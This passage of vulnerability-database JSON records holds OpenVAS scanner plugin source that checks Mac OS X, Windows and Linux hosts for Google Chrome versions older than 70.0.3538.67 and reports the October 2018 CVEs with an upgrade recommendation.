\"CVE-2018-17462\", \"CVE-2018-17471\",\n \"CVE-2018-17470\", \"CVE-2018-17469\", \"CVE-2018-17468\", \"CVE-2018-17467\",\n \"CVE-2018-17466\", \"CVE-2018-17465\", \"CVE-2018-17464\", \"CVE-2018-17463\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-17 11:15:41 +0530 (Wed, 17 Oct 2018)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2018-10)-Mac OS X\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Sandbox escape in AppCache.\n\n - An input validation error in V8.\n\n - Heap buffer overflow error in Little CMS in PDFium.\n\n - Multiple URL and UI spoofing errors in Omnibox and Extensions.\n\n - Multiple memory corruption errors in Angle and GPU Internals.\n\n - Multiple use after free errors in V8 and Blink.\n\n - Lack of limits on 'update' function in ServiceWorker.\n\n - Security UI occlusion in full screen mode.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attackers\n to bypass security restrictions, execute arbitrary code, conduct spoofing attack\n and cause denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 70.0.3538.67 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version 70.0.3538.67\n or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2018/10/stable-channel-update-for-desktop.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"70.0.3538.67\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"70.0.3538.67\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T21:53:47", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-10-17T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2018-10)-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17464", "CVE-2018-17470", "CVE-2018-17467", "CVE-2018-17471", "CVE-2018-5179", "CVE-2018-17466", "CVE-2018-17474", "CVE-2018-17465", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17473", "CVE-2018-17463", "CVE-2018-17477", "CVE-2018-17469", "CVE-2018-17462", "CVE-2018-17468"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310814094", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814094", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop-2018-10)-Windows\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814094\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2018-5179\", \"CVE-2018-17477\", \"CVE-2018-17476\", \"CVE-2018-17475\",\n \"CVE-2018-17474\", \"CVE-2018-17473\", \"CVE-2018-17462\", \"CVE-2018-17471\",\n \"CVE-2018-17470\", \"CVE-2018-17469\", \"CVE-2018-17468\", \"CVE-2018-17467\",\n \"CVE-2018-17466\", \"CVE-2018-17465\", \"CVE-2018-17464\", \"CVE-2018-17463\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-17 10:35:08 +0530 (Wed, 17 Oct 2018)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2018-10)-Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Sandbox escape in AppCache.\n\n - An input validation error in V8.\n\n - Heap buffer overflow error in Little CMS in PDFium.\n\n - Multiple URL and UI spoofing errors in Omnibox and Extensions.\n\n - Multiple memory corruption errors in Angle and GPU Internals.\n\n - Multiple use after free errors in V8 and Blink.\n\n - Lack of limits on 'update' function in ServiceWorker.\n\n - Security UI occlusion in full screen mode.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attackers\n to bypass security restrictions, execute arbitrary code, conduct spoofing attack\n and cause denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 70.0.3538.67 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version 70.0.3538.67\n or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2018/10/stable-channel-update-for-desktop.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"70.0.3538.67\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"70.0.3538.67\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T21:52:37", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-10-17T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2018-10)-Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17464", "CVE-2018-17470", "CVE-2018-17467", "CVE-2018-17471", "CVE-2018-5179", "CVE-2018-17466", "CVE-2018-17474", "CVE-2018-17465", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17473", "CVE-2018-17463", "CVE-2018-17477", "CVE-2018-17469", "CVE-2018-17462", "CVE-2018-17468"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310814095", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814095", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop-2018-10)-Linux\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814095\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2018-5179\", \"CVE-2018-17477\", \"CVE-2018-17476\", \"CVE-2018-17475\",\n \"CVE-2018-17474\", \"CVE-2018-17473\", \"CVE-2018-17462\", \"CVE-2018-17471\",\n \"CVE-2018-17470\", \"CVE-2018-17469\", \"CVE-2018-17468\", \"CVE-2018-17467\",\n \"CVE-2018-17466\", \"CVE-2018-17465\", \"CVE-2018-17464\", \"CVE-2018-17463\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-17 11:15:02 +0530 (Wed, 17 Oct 2018)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2018-10)-Linux\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Sandbox escape in AppCache.\n\n - An input validation error in V8.\n\n - Heap buffer overflow error in Little CMS in PDFium.\n\n - Multiple URL and UI spoofing errors in Omnibox and Extensions.\n\n - Multiple memory corruption errors in Angle and GPU Internals.\n\n - Multiple use after free errors in V8 and Blink.\n\n - Lack of limits on 'update' function in ServiceWorker.\n\n - Security UI occlusion in full screen mode.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attackers\n to bypass security restrictions, execute arbitrary code, conduct spoofing attack\n and cause denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 70.0.3538.67 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version 70.0.3538.67\n or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2018/10/stable-channel-update-for-desktop.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"70.0.3538.67\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"70.0.3538.67\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:34:00", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-25T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for Chromium (openSUSE-SU-2018:3396-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17464", "CVE-2018-17470", "CVE-2018-17467", "CVE-2018-17472", "CVE-2018-17471", "CVE-2018-5179", "CVE-2018-17466", "CVE-2018-17474", "CVE-2018-17465", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17473", "CVE-2018-17463", "CVE-2018-17477", "CVE-2018-17469", "CVE-2018-17462", "CVE-2018-17468"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851948", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851948", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the L